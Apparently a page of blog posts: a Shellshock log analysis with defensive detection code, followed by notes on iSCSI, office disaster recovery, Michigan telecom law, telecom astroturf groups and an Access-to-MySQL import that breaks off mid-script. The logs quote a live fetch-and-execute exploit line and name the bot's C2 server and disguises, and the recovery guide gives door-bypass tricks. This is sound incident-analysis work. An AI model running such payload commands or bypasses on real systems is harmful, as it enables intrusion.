Decode of IRC bot deployed by shellshock vulnerability

Today I saw a shellshock scan in my Apache logs:

[Mon Nov 03 16:43:02 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/vpasswd.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:43:14 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/tigvote.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:43:32 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/smartsearch, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:17 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/newsdesk.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:21 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/musicqueue.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:23 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/mt-static, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:28 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/mmstdod.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:32 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/main.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:48 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/ImageFolio, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:55 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/html2chtml.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:45:21 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/ezshopper, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:45:34 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/dfire.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:46:19 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/book.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:46:28 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/bb-rep.shHTTP
[Mon Nov 03 16:46:38 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/auktion.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:46:39 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/auction, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl

What this means in layman's terms is that the requester seems to think I'll execute the code in the referrer header (some CGI scripts would do this, especially with the bash vulnerability). What it wants me to do is go to that URL, download the code contained within, and execute it.
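As an added example (not code from the original post), the following Python picks probes like the ones quoted above out of an Apache error log: a referer value that opens with the Bash function definition "() {" is the Shellshock marker. The log lines, client addresses and payload host in it are constructed samples, and the function names are illustrative.

```python
import re
from collections import defaultdict

# Apache 2.2 error-log layout, matching the lines quoted in the post.
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<client>[^\]]+)\] "
    r"script not found or unable to stat: (?P<path>.*?)"
    r"(?:, referer: (?P<referer>.*))?$"
)
# A Bash function definition "() {" opening a header value is the Shellshock marker.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")
URL_RE = re.compile(r"https?://[^\s'\";|]+")

# Constructed sample lines: documentation addresses and a placeholder host.
# The third line is cut off the way one line in the post is; the fourth is benign.
SAMPLE_LOG = """\
[Mon Nov 03 16:43:02 2014] [error] [client 192.0.2.10] script not found or unable to stat: /usr/lib/cgi-bin/vpasswd.cgi, referer: () { :; }; wget -qO - http://payload.example.invalid/lib/index.cgi | perl
[Mon Nov 03 16:43:14 2014] [error] [client 192.0.2.10] script not found or unable to stat: /usr/lib/cgi-bin/main.cgi, referer: () { :; }; wget -qO - http://payload.example.invalid/lib/index.cgi | perl
[Mon Nov 03 16:46:28 2014] [error] [client 192.0.2.10] script not found or unable to stat: /usr/lib/cgi-bin/bb-rep.shHTTP
[Mon Nov 03 16:50:00 2014] [error] [client 198.51.100.7] script not found or unable to stat: /usr/lib/cgi-bin/old.cgi, referer: http://www.example.com/links.html
""".splitlines()


def defang(url):
    """Make a URL non-clickable before it goes into a ticket or report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def analyse(lines):
    """Group Shellshock probes by client.

    Returns {client: {"paths": [...], "urls": {...}, "other_lines": n}} where
    other_lines counts that client's log lines that carried no marker
    (for example truncated lines), so they can be reviewed by hand.
    """
    probes = []
    others = defaultdict(int)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m is None:
            continue  # not a "script not found" error line
        referer = m.group("referer") or ""
        if SHELLSHOCK_RE.search(referer):
            urls = {defang(u) for u in URL_RE.findall(referer)}
            probes.append((m.group("client"), m.group("path"), urls))
        else:
            others[m.group("client")] += 1

    report = {}
    for client, path, urls in probes:
        entry = report.setdefault(
            client, {"paths": [], "urls": set(), "other_lines": others.get(client, 0)}
        )
        entry["paths"].append(path)
        entry["urls"].update(urls)
    return report


if __name__ == "__main__":
    for client, entry in analyse(SAMPLE_LOG).items():
        print(client, len(entry["paths"]), "probes,",
              entry["other_lines"], "other lines,", sorted(entry["urls"]))
```

A "script not found" result only says that this particular path did not exist; the same client should also be searched for in the access log, where a request that did reach a real CGI script would appear.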

This is dangerous. I don't recommend it. It's obfuscated by using base64 encoding. I changed the exec statement to a print, and output that to a file. I zipped both and they are both here for forensic purposes.

It looks like the bot will change its name in the process table to one of the following:

my @rps = ("/usr/local/apache/bin/httpd -DSSL",
 "/usr/sbin/httpd -k start -DSSL",
 "/usr/sbin/httpd",
 "ksoftirqd/0",
 "khelper",
 "kblockd",
 "/usr/sbin/apache2 -k start",
 "kmpathd",
 "httpd",
 "/usr/sbin/acpid",
 "/usr/sbin/cron");
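
One way to check a host for the renaming described above, as an added example that is not part of the original post or of the bot's code. Rewriting the name a process shows in the process table does not change its /proc/<pid>/exe link, and genuine kernel threads have an empty cmdline. The function names and sample records are constructed for illustration, and the check assumes the process reports exactly one of the strings in the list above.

```python
import os

# Names the post lists as the bot's process-table disguises.
KERNEL_THREAD_NAMES = {"ksoftirqd/0", "khelper", "kblockd", "kmpathd"}
DAEMON_NAMES = {
    "/usr/local/apache/bin/httpd -DSSL", "/usr/sbin/httpd -k start -DSSL",
    "/usr/sbin/httpd", "/usr/sbin/apache2 -k start", "httpd",
    "/usr/sbin/acpid", "/usr/sbin/cron",
}

# Constructed sample records in the shape read_proc() returns.
SAMPLE = [
    {"pid": 3, "ppid": 2, "cmdline": "", "exe": None},  # genuine kernel thread
    {"pid": 700, "ppid": 1, "cmdline": "/usr/sbin/cron", "exe": "/usr/sbin/cron"},
    {"pid": 812, "ppid": 1, "cmdline": "/usr/sbin/apache2 -k start",
     "exe": "/usr/sbin/apache2"},
    {"pid": 4410, "ppid": 1, "cmdline": "/usr/sbin/httpd", "exe": "/usr/bin/perl"},
    {"pid": 4422, "ppid": 1, "cmdline": "kblockd", "exe": "/usr/bin/perl"},
]


def read_proc(root="/proc"):
    """Collect pid, ppid, cmdline and exe for every process (Linux, run as root)."""
    records = []
    for entry in os.listdir(root):
        if not entry.isdigit():
            continue
        base = os.path.join(root, entry)
        try:
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                raw = fh.read()
            with open(os.path.join(base, "stat")) as fh:
                # comm may contain spaces, so split after the closing ')':
                # the fields that follow are state, then ppid.
                ppid = int(fh.read().rsplit(")", 1)[1].split()[1])
        except (OSError, ValueError, IndexError):
            continue  # process exited while it was being read
        try:
            exe = os.readlink(os.path.join(base, "exe"))
        except OSError:
            exe = None  # kernel thread, or no permission to read the link
        cmdline = raw.replace(b"\0", b" ").decode("utf-8", "replace").strip()
        records.append({"pid": int(entry), "ppid": ppid,
                        "cmdline": cmdline, "exe": exe})
    return records


def check(rec):
    """Return a reason string if the record looks disguised, else None."""
    cmd, exe = rec["cmdline"], rec["exe"]
    if cmd in KERNEL_THREAD_NAMES:
        # Real kernel threads expose an empty cmdline, so a process that
        # reports one of these names through cmdline runs in userland.
        return "userland process using kernel-thread name %r (exe=%s)" % (cmd, exe)
    if cmd in DAEMON_NAMES and exe is not None:
        claimed = os.path.basename(cmd.split()[0])
        actual = os.path.basename(exe.replace(" (deleted)", ""))
        if claimed != actual:
            return "cmdline claims %r but exe is %s" % (claimed, exe)
    return None


def find_masquerades(records):
    """Return [(pid, reason)] for every record that check() flags."""
    hits = []
    for rec in records:
        reason = check(rec)
        if reason:
            hits.append((rec["pid"], reason))
    return hits


if __name__ == "__main__":
    for pid, reason in find_masquerades(read_proc()):
        print(pid, reason)
```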

Then it will connect to the IRC server 'mboost.su' on port 443. It will join #shock and accept commands from 'M', 'st0n3d','x00' and 'jorgee'.

 

It accepts a myriad of commands to UDP flood hosts, portscan them, connect to arbitrary ports, reverse shell, and ctcp/msg/noticeflood anyone on the IRC server. It can also send emails from the target machine, and download any arbitrary file.

If you haven't patched your server, keep your eyes out. Exploits are definitely in the wild.

Linux iSCSI initiator Notes

My own notes on the Linux iSCSI initiator – applicable to myself, but maybe also to you.

Discover IQNs from the portal

iscsiadm -m discovery -t st -p 192.168.0.x

Log into an IQN (attach it as a drive)

iscsiadm -m node --targetname "iqn.2002-02.com.xsadf:asdfasdf:freenas2:paulextent1" --portal 192.168.0.x --login

Do your thing

Log out of the IQN (make the device go away, from the OS standpoint)

 

iscsiadm -m node --targetname "iqn.2002-02.com.xsadf:asdfasdf:freenas2:paulextent1" --portal 192.168.0.x --logout

https://wiki.debian.org/SAN/iSCSI/open-iscsi  <– Debian's docs on this

“What’s that burning smell?”

In 2006, with a strong case of senior-itis after putting in notice at my last employer, I was asked to document a number of things I did regularly or special things that may be done incorrectly that would be helpful to know. One of the documents I can share, because it pertains entirely to nonexistent servers, non existing servers, and a building prior to the full dissolution of my previous employer's Detroit office.

It's among my favorites, one I actually saved a copy of because I liked the sense of humor I had about what had (more than) once been a very frustrating task for me to perform.

“What’s that burning smell?”

A guide on how to recover the Detroit office from a full, extended power outage.

Paul Timmins

Okay, if you’re reading this document, you’re probably pretty screwed. Here’s a step by step guide.

Breaking into the office: (This is only necessary if the door controllers are not working right) [editor's note: they never work right]

  1. The hold magnets are rated for 300 pounds of lateral force. Don’t waste your time dinking with trying to pull them open. You’ll break the door first. You have two options:
    1. 1⁄4” – 1⁄2” steel rod, 1 meter long. (you can get this at home depot for a buck, it might be threaded, but who cares) Slip this through the crack between the door and the jamb, and use it to push the emergency exit button. It requires about 2 pounds of force, so a meterstick might not be sufficient.
    2. MacGyver method. Heat up a party balloon under your arm until it’s about 85-90 degrees. Stick its mass through the door, and hold it by its neck. Inflate it with a drinking straw. Release the balloon, such that it flies in the path of the motion sensor. This may take several tries.
    3. The fire panel can override the perimeter locks. There are two ways to trigger this. One is to call property management and convince them to override your locks at the fire panel. Option two is left as an exercise to the reader.
  2. So you’re in. Now what? Well, that server room lock is failshut. You can’t operate it in a power outage, and there’s no fire panel override. It’s a 6 pin tumbler lock with no special warding. A locksmith (or me!) can open it in under 15 minutes with a simple set of lockpicks. Prop this door because it WILL relock.

Getting everything happy:

  1. Ensure you have power to the entire office. Getting halfway through this to find out that you only have power to half the room is not good.
  2. Air conditioning is critical. The room should be below 70F. If it is above 85F, do not continue until the AC has cooled the room. This can occur if the systems run off UPS for a while, because the AC is not on the UPS. If the AC isn’t spitting cold air out the vent by the door, turn the thermostat “OFF”, then to “COLD”, waiting 30 seconds between the toggle to avoid problems with the AC compressor. IF THE BUILDING LOSES PRESSURE TO THE CHILLERS, YOU MUST DO THIS STEP BECAUSE THE INTERLOCKS WILL SHUT OFF THE AC TO PREVENT DAMAGE, AND THE INTERLOCKS ARE RESET BY DOING THIS. BUILDING MANAGEMENT CANNOT HELP YOU WITH THIS – THE SERVER ROOM AC BELONGS TO TB.
  3. By now, you’re enjoying the fresh air. Make sure all computers are off, and then power on the UPSen. If they fully discharged, they’re going to have a lot of inrush current in the first 10 seconds, so you should do this step. It just might save you a blown breaker. (though I have not experienced this)
  4. Now we start powering up equipment. Power on all Ethernet switches. They are booted when all the lights are out but power, and maybe a few ports blinking away cheerfully. In 30 minutes you’ll be as happy as those little green lights are, so stay calm.
  5. Then power on the T1 router. It’s a Cisco 1700 series in the telecom rack. It is functional when you see W0 lit as active. If this is a regional power outage or natural disaster, check the back to make sure the alarm light isn’t illuminated. If it is, the T1 line itself is down. Call MCI/Verizon Business/AT&TMCI/Bell System, American Telephone and Telegraph, and related companies, depending on the level of telecom consolidation when you read this. The circuit is through UUnet as of this writing.
  6. Then power on the ASA. It is functional when the lights are doing their happy blinky thing.
  7. Power on DC3 and DC4. This will establish an AD tree relationship with San Mateo/San Francisco/Bunch of people screaming for help floating in the water after the “Big One”.
  8. Watch them come up on the KVM. Have a beer.
  9. Power on DC1DT and DC2DT, taking care not to spill your beer on the servers. DC2DT may take a waving of a dead chicken over top of it to properly boot as of this writing.
  10. Once those come up, make sure all raid enclosures in the office are plugged in and operating. Wave dead chicken as necessary.
  11. Power on ops-mon, FS3DT, and EX1DT.
  12. Power on PHONESYSTEM, ensuring both power supplies have power. Green LEDs are illuminated at the back of the power supply, right? This is very heat sensitive, so if you have to delay it to get the server room below 75 F, please do.
  13. Reset the doorlock controllers. They’re the big box with the ominous triangle printed on them on the wall above the keyboard for the phonesystem. Just yank their power, plug them back in, and listen in amusement as they do a little clicky dance with all the relays. The system is now reset and mostly operational.
  14. Power on the HP desktop across from the phonesystem. This dinky ass piece of crap is the badging machine. Log into it as local administrator, password is supplied elsewhere. Make sure that stupid dos window with the numbers counting comes up (it’s in the startup group, so it should!). Don’t close that. At this point, you can, in theory, rely on the door locks. Test them at the server room door.
  15. Power on the backup machine.
  16. Power on the rest of the computers. I just turn every computer in the room on to be safe.
  17. As a courtesy, power on the tenant’s crap. You don’t have to, but it builds goodwill and they’re more likely to give you favors. Seriously.
  18. Check your email. If it works, go home, or whatever.
Copyright Walt Disney Corporation, 1974

Michigan SB636 passed, allowing termination of landline phone service. Now what?

“Mr. Speaker and members of the House:

Today a disservice was done to the citizens of the State of Michigan. This bill hampers competition and allows a greedy large corporation to take advantage of some of the most vulnerable segments of our population. Senior citizens and lower income users deserve to be protected. In this case, they are not. I hope that in future votes my colleagues will take into consideration the long term effects of legislation that we pass.”

– Rep. LaVoy, Michigan House Journal 27 of 2014

On 3/11/2014, Senate Bill 636, as amended, was passed in the State House of Representatives of Michigan. For my post on the original bill, click here. (Please note there is an important amendment I'll be discussing below.)

Not all is lost. Numerous news reports (many of them sympathetic to AT&T's position, but it raised attention regardless), 19,000+ hits to this blog, attention from many other blogs and websites, and  outcry from numerous public safety, consumers rights groups, and competitive providers managed to hold off this law for almost 3 months. In that time, something that passed the state Senate in 2 days with a final vote of 31 yeas, 4 nays, 2 excused, and 1 abstain ended up passing the state House in nearly 90 days, with 71 Yeas and 39 nays, and only after being amended.

What was the amendment, and what does it do? Are we safe?

It adds onto the section that allows a provider to withdraw as a telephone company entirely (as long as there was a workable solution for 911 emergency calling in the area),  a section binding the withdrawing carrier to the FCC IP Transition order, should they choose to withdraw.  (This would apply whether it's a formal FCC IP Transition trial or not, until federal regulations are passed codifying the IP transition nationwide, which would likely supersede any state laws we have on the topic anyway, so we're only losing so much here)

Regulation of interconnection, wholesale access, and consumer issues would remain the purview of the MPSC, using the FCC IP Transition trial rules until the FCC passes its own final rules for the IP transition.

Have no illusions – this isn't the best case scenario for Michigan consumers, or competitive providers. But it's much better for them than the original SB636. The FCC IP transition order provides some consumer protection (but not a lot) by requiring applicants to prepare reports on the impact of transition for many different types of things, such as credit card terminals, heart monitors, etc. And it allows wholesale access to legacy network elements, so competitive providers could decide to provide legacy TDM/POTS equivalent service if there is market demand for it (and obviously in many places, there would be).

What it doesn't do is compel the RBOC/ILEC to provide those legacy TDM/POTS equivalent services. The upside for consumers is that there are carriers who would happily take that business from the ILEC (including the carrier I work for), and theoretically anyway, we'd be able to do so using our own equipment and the ILEC's wires.

The downside is, many subsidies would not be available to provide same, and CLECs don't necessarily have the sunk cost to provide this service cheaply (some do, in some areas). This could have a disproportionate impact on low-income families and rural customers, where there are fewer customers (or mostly low income customers who are paying the bare minimum the plans would offer) to subsidize a network build to provide a replacement product.

The FCC IP trials state there has to be protection of low-income/elderly/disabled customers, but I'm not certain what that would ultimately mean. Where are the cutoffs for low-income and elderly? What kind of price increases would be okay?

Smarter people than I have summarized the IP trial orders here.

The bill, because of the amendments, has to go back to the senate, where it is expected to be passed immediately, and the governor is expected to sign it. Rumors say that the governor pushed hard for these changes, as he did not want the original bill to be passed as written – nobody wants to be the governor that took away phones from elderly people, and gave away state level oversight of the largest public utilities in their state. Well, at least no governor with common sense, anyway.

Time will tell if these changes are enough to protect everyone. I'm not sure anyone with experience in the industry can tell you at this point where things will be by 2017 on these issues. It's notable that the Michigan IP transition laws would kick in right after the current presidential administration term limits out, and a new administration will take its place roughly 20 days after the law kicks in. Part of me can't help but think that AT&T will have their claws dug deeply into the backs of the nominees of both parties.

So is this the end? Are we screwed now?

No. Though many of these issues move to various other states, and the federal level. (AT&T often uses Michigan as a model for legislation in other places – HB4314 was used to prove that if similar legislation was passed in other states, they too would benefit from increased deployment of AT&T's U-Verse product, for example, and from increased investment in their state. AT&T expanded U-Verse deployment, and located more employees in Michigan as a reward for passing HB4314)

Additionally, with Network Neutrality changes, broadband data caps, and the consolidation of major industry players any ability to offer services over the broadband connection of a third party (such as Vonage, Aereo, Skype, Youtube, Hulu, and Netflix) is severely threatened. More independent carriers would let the free market figure out network neutrality, but with consolidation and things like SB636 (at least in its original incarnation, though we don't know what this new incarnation will really bring for certain) we impact the ability for new entrants to create proper competitive pressure. (Each of those links contains more information, and on most, an opportunity to voice your opinion).

As for the FCC's IP Transition policies, you still have an opportunity to lend your voice. DoctorOhhnoes points out in an earlier post that there is still an opportunity to comment on the transition with the FCC.

Numerous groups are working on things such as privacy from the NSA, SOPA censorship, overreaching copyright law, broadband data caps and lots of other things.

What would solve this entirely?

In short, what they call "Structural Separation" – this is when companies are split up between the side that maintains the outside plant infrastructure, and the company that provides voice and data services. The outside plant company would only care what customer belongs to whom as a technical necessity (ie: Where does this customer's wire, fiber optic cable, etc get hooked to in the central office? To AT&T's switch, or to another carrier?). They would own all the buildings, structures, and wires.

This company would be legally separate from any company providing data or voice services, much like AT&T long distance was broken off from the Bell system in 1984, but in this case we're taking it a step further – separating phone companies from the outside wires. AT&T would pay rent to be in the buildings under the same terms and conditions that competing carriers do, and be subject to the same outside plant conditions that the other carriers would.

Any improvements to the outside plant would be cost averaged across the combined customer base, and would affect all carriers equally. AT&T wouldn't benefit unduly from having a large embedded base (except from the usual economies of scale with billing, support, IP transport, and telephone service), and any carrier could roll out any technically possible service at any time.

The outside plant company would have an incentive to come up with better quality loops, better fiber optic penetration, better everything because carriers would demand that of them (and would work out a way to pay for it collectively, if necessary), and they would all benefit equally from the deployment. The outside plant company may even come up with better products to offer – for example, a wholesale VDSL2 DSLAM setup in the neighborhoods that any carrier could pay to use with their equipment to extend the reach. This would allow nearly any carrier to roll out a U-Verse like service overnight. Economies of scale would be spread across all market participants – Currently if 4 companies in a business park want service from 4 different carriers, each has to run their own fiber to the customer's building all the way back to a central point. A structural separated provider could run one 48 count cable to the business park, and hand all 4 carriers their own set of strands to each building. If a customer wanted to change carriers, or add a second, they'd be able to hook up unused capacity, or even swap a cable over from one carrier to another in the central office. This means the entire business park could benefit from that scale, and bringing the other buildings into the fold would be simplified, no matter what carrier they want to use.

It may sound utopian, but several countries are doing this today.

Imagine if your house had access to fiber optic services from 4-6 companies. Do you think people would still be talking about net neutrality and bandwidth caps? Heck no, because if one of those carriers sold capless products that worked well with everything, people could switch in a heartbeat to them. There's no sunk costs and no startup time. The company that tried to limit their customers unnecessarily would be out of business in a heartbeat.

TL;DR

Too much to read? Summary: AT&T managed to get their bill passed with some change due to consumer and citizen outcry. The changes are good, but not as good as not having the law at all.

While the future is uncertain, you still have influence, and there are many battles other than this one that can have similar impact on you, no matter who you buy your services through. I strongly urge you to weigh in on them with those who are in power (and many of them are actually listening, as this isn't a particularly partisan issue, and affects everyone!). I strongly urge people to pressure their legislators, and their friends, to become educated on the topics I mentioned above, and to push people to have positions on them, much like people do about things like abortion, gun control, social security, and other stuff. Almost everyone in the US uses a telephone or the internet daily, and what happens to these services matters a lot.

And if you haven't seen what the other side is capable of, I strongly suggest checking out my earlier post about AT&T's involvement with Astroturf groups here. Other sites discuss this in greater detail.

And to steal a line from Dr Seuss: “Unless someone like you cares a whole awful lot, Nothing is going to get better. It's not.”

Astroturf

How green is the astroturf over there?

A recent article in Fierce Telecom titled "Special access, end of PSTN no secret to wireline marketplace", written by Bruce Mehlman, was a response to an article written by Bruce Kushnick, who is no friend of the incumbent telephone companies, for sure.

But who is Bruce Mehlman and the organization he co-founded, the "Internet Innovation Alliance"? Good question.

The tone of the article would imply that they're an advocacy group for broadband by any means necessary – they want speed and don't care under what terms and conditions it's available, as long as it's "cheap".  Seems fair and innocent enough, from the "cheap, fast, good, pick two" – they chose cheap and fast. I disagree with this strategy, but more power to them.

But wait – what they're advocating is exactly what AT&T is trying to carry out with SB636 in Michigan. I can't help but think that's a bit odd, so I dig a bit to see what the story is with this "Internet Innovation Alliance" that I've never heard of before. What I found was interesting.

With some digging, I found their list of members.

I'll reproduce it here:

 

Member | Relationship | Notes
1 Economy Incorporated | Donor | Supported by AT&T and Verizon
American Council of the Blind | Donor | AT&T and Verizon are major sponsors of their event.
The American Conservative Union | Ideological | Not specifically related to AT&T. Generally supports elimination of government regulations.
Applied Optoelectronics | Supplier | Supplier for AT&T and Verizon's FTTP products
Alcatel-Lucent | Supplier/Common Origins | One of AT&T's largest suppliers. Lucent was a spinoff of Bell Labs, which was at one time AT&T.
Americans for Tax Reform | Ideological | Not specifically related to AT&T. Generally supports elimination of government regulations.
AT&T | Self | The phone company. The people the organization speaks highly of in the op-ed.
B-Tech | Supplier | AT&T Supplier – AT&T's logo is right on their front page.
Berry Test Sets | Supplier | AT&T Supplier – Ironically provides premier test equipment for that "obsolete network" that they're trying to get rid of. Their techs carry this tool a lot.
Communications Technology Solutions / CBM of America | Supplier | AT&T Vendor
Ciena | Supplier | AT&T Vendor
Condux | Supplier | AT&T Vendor
CompTIA | Indeterminate | Not specifically related to AT&T, but AT&T is a large sponsor of theirs.
Connected Nation | AT&T related AstroTurf group | Astroturf group heavily funded by AT&T. Even performs research for AT&T.
Corning | Supplier | Major AT&T Supplier of Fiber Optic Cable
United States Cattlemen's Association | Indeterminate, likely donor | The site doesn't mention sponsors at all, but the cattlemen's association goes out of its way to file FCC comments all the time in support of various AT&T initiatives.
FiberControl | Indeterminate | Probably an AT&T supplier. Very niche equipment supplier.
GoFoton | Supplier | CTO worked at AT&T for 30 years, likely an AT&T supplier as well.
National Grange of the Patrons of Husbandry | Indeterminate, likely donor | Outspoken advocate of AT&T's policies. Major donors not mentioned on their homepage.
American Homeowners Grassroots Alliance | Indeterminate, likely a front group | AHGA and AHF Privacy Policy- AHGA and AHF will not disclose any information whatsoever about their members, customers, or supporters to any other parties under any circumstances. – Advocate of AT&T policies in the past.
Hispanic Telecommunications and Technology Partnership | Indeterminate, likely a front group | Promotes many AT&T initiatives, ties to the NTCA and USTA. All positions seem to be related to AT&T initiatives.
Hispanic Leadership Fund | Indeterminate, likely ideological | Unknown, no public webpage, no known policy statements.
Independent Technologies Inc | Supplier | Supplier, ironically, of equipment for AT&T's "Obsolete" POTS/TDM network.
Independent Women's Forum | Donor/Ideological | AT&T is a donor to the IWF. Generally supports elimination of government regulations.
Japanese American Citizens League | Donor | "Website made possible by the generous sponsorship of AT&T" (search in page for that string)
LCLAA | Trade Union | Trade Union group (Trade unions that deal with AT&T tend to support AT&T policy in exchange for promises to include their laborers in new initiatives)
LULAC | Donor/Ideological | AT&T is part of their "Corporate Alliance"
Intertribal Agriculture Council | Likely Donor | Recently, the Intertribal Agricultural Council has been involved in many non-agricultural things, such as the AT&T and T-Mobile merger, and the Sirius XM merger. Why? Who knows.
MetroTel Corp | Supplier | AT&T Supplier
Minerva Networks | Potential Supplier | Minerva sells IPTV middleware that controls IPTV set top boxes. AT&T uses Microsoft MediaRoom, but given that Microsoft has no interest in continuing that line, I suspect AT&T is working with Minerva at this point to replace MediaRoom.
National Association for Female Executives | Likely Donor | Both NAFE and AT&T pat each other on the back a lot.
National Association of Neighborhoods | Likely Donor | NAH has spoken heavily in favor of previous AT&T initiatives.
National Coalition on Black Civic Participation | AT&T and CWA staff on board of directors
National Health IT Collaborative for the underserved | Likely Donor | They do not appear to have made any public statements in favor of AT&T initiatives, and appear to be otherwise legitimate.
National Black Chamber of Commerce | Donor | The AT&T Foundation has donated thousands to this group, if not more.
National Puerto Rico Coalition | Donor | AT&T is a primary sponsor.
National Spinal Cord Injury Association | Likely Donor | They do not appear to have made any public statements in favor of AT&T initiatives, and appear to be otherwise legitimate.
OASIS Institute | Donor | AT&T donated half a million dollars to this group.
National Utility Contractors Association | Supplier | Consortium of AT&T suppliers
Prysmian Cables and System | Supplier | Manufacturer of fiber optic cable
Small Business Entrepreneurship Council | Ideological | Possibly supported by AT&T, definitely ideologically opposed to government regulation.
Sumitomo Lightwave | Supplier | Fiber optic manufacturer
Sheyenne Dakota, Inc | Likely Supplier | They manufacture wiring harnesses.
SeniorNet | Donor | AT&T and Verizon are sponsors.
SNC Manufacturing | Supplier | AT&T supplier of high voltage isolation equipment
Suttle | Supplier | Supplier of various telecommunications cabling and connectors. (Many punchdown blocks are made by Suttle)
Telesync | Supplier | Ironically, most of their products are for those old, evil POTS services they're trying to get rid of.
TechAmerica | Consortium | AT&T is a member
USIIA | Consortium | AT&T is involved with this group. Verizon has an employee on the board of directors. They have a history of speaking in favor of all AT&T initiatives, all the way back to the BellSouth merger.
Women Impacting Public Policy | AT&T employees part of advisory board / Ideological | Corporate Advisory Board has AT&T (and Comcast, who does not oppose these laws) members. Several. Generally supports elimination of government regulations.
Asian Women in Business | Donor | AT&T heavily sponsored this group

Now, to be clear, I don't think that taking a single dollar of AT&T's money taints you. But when you're part of a public policy group that is unrelated to your mission (What does this have to do with Indian agriculture, or cattlemen?), and you take money from AT&T, your opinion may be not as independent as you make it sound.

The thing with nonprofits is, they don't have an inherent means of self support. They rely on donors. If you get a big donor that seems awesome at first, it opens a lot of doors for you. When they ask for your support, and it doesn't seem completely unreasonable (just sign your name to this, it's going to pass anyway and we could really use your help, as we've helped you in the past) – few organizations can afford to say no, especially if it doesn't harm their constituency directly or go against their stated goals. It puts them in the unenviable position of either giving a large donor a hand over something inconsequential to their members/beneficiaries/whatever, or taking an unnecessary stand to say "This is tangential to our mission" and risk a pay cut.

Output of a MySQL select command

Importing Microsoft Access databases into MySQL under Linux

I needed to do this, and found the existing documentation somewhat lacking. My work will be on a file in the original MDB access format (not the newer XML based ones). I'm working on Debian Linux. Instructions for derivatives (such as Ubuntu) should be identical. Other distributions (Redhat Based) may use different package names (using the yum package manager should simplify this, but I have not tested these instructions under Redhat/CentOS/etc).

For the purposes of my example, I'll call my MySQL database "taco" and my Access file "nacho.mdb".

Where I say "(creds)" you place any connection information you may usually need – an example would be "-h database.yourdomain.com -u youruser -pyourpassword"

First, install the mdbtools package:

apt-get install mdbtools

Answer the questions as appropriate.

Create a new database to hold these files:

optional, but suggested. You can always move tables around later.

mysqladmin (creds) create taco

Build empty tables to house all your data, using the Access schema:

This creates empty tables with the same names, structures, and datatypes (or their equivalents) as the access database.

mdb-schema nacho.mdb mysql | mysql (creds) taco

Copy all the data over:

I asked for a tables list, comma delimited. Then I removed the trailing comma, then told xargs to run mdb-export for each table name in the file. BLAH is used as a placeholder, and is replaced by whatever table name it's working on. Please note the positions of commas and spaces are crucial to the proper operation of this command.

mdb-tables -d, -t table nacho.mdb |sed 's/,$//'|xargs -d, -I BLAH mdb-export -I mysql nacho.mdb BLAH|mysql (creds) taco

If you make a mistake:

I know, we're all perfect, right? But let's pretend …your friend… makes a mistake, or encounters a correctable error in processing. The easiest thing to do is dump the mysql database and start all over (you did create a new database just for this, right?)

mysqladmin (creds) drop taco

Answer "Y" and push forward. Only by losing everything are we free to do anything. That's what you'll tell yourself to feel better about the time wasted by starting over. Unless you know what you're doing, I promise you this is the easiest, quickest way.
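The same import as a single script, added here as an example and not taken from the original post: it keeps the password in a private option file instead of on the command line, reads table names one per line so a name containing a comma or space cannot split, and stops at the first table that fails. The function names and the four-argument invocation are assumptions of this example.

```shell
#!/bin/sh
# Added example (not the author's code): the import steps as one script.
# Assumes mdbtools and the MySQL client are installed and the target
# database already exists.

# Write a MySQL option file only the current user can read, so the password
# never appears on a command line (process list, shell history).
# The password is double-quoted; one containing " or \ needs escaping first.
write_client_cnf() {  # usage: write_client_cnf HOST USER PASSWORD
    cnf=$(mktemp) || return 1
    chmod 600 "$cnf"
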